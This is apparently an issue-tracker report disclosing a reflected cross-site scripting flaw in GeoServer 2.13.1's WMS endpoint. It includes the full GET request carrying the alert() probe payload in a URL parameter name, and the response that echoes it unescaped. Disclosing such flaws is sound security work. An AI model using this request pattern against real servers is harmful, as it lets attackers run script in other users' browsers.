Reflected cross-site scripting vulnerabilities in wms

Description

From our security test :
The name of an arbitrarily supplied URL parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 25064;alert(1)//419 was submitted in the name of an arbitrarily supplied URL parameter. This input was echoed as 25064;ALERT(1)//419 in the application's response.

GET /geoserver/nurc/wms?service=WMS&version=1.1.0&request=GetMap&layers=nurc:Arc_Sample&styles=&bbox=-180.0,-90.0,180.0,90.0&width=768&height=384&srs=EPSG:4326&format=application/openlayers&25064%3balert(1)%2f%2f419=1 HTTP/1.1

*Response *
HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
.....
params: {'FORMAT': format,
'VERSION': '1.1.1',
25064;ALERT(1)//419: '1',
STYLES: '',
LAYERS: 'nurc:Arc_Sample',
}
......

This is for
/geoserver/nurc/wms
/geoserver/sf/wms
etc..

Environment

Centos 7

Status

Assignee

Unassigned

Reporter

Nenad Steric

Triage

None

Fix versions

Affects versions

2.13.1

Components

Priority

Medium
Configure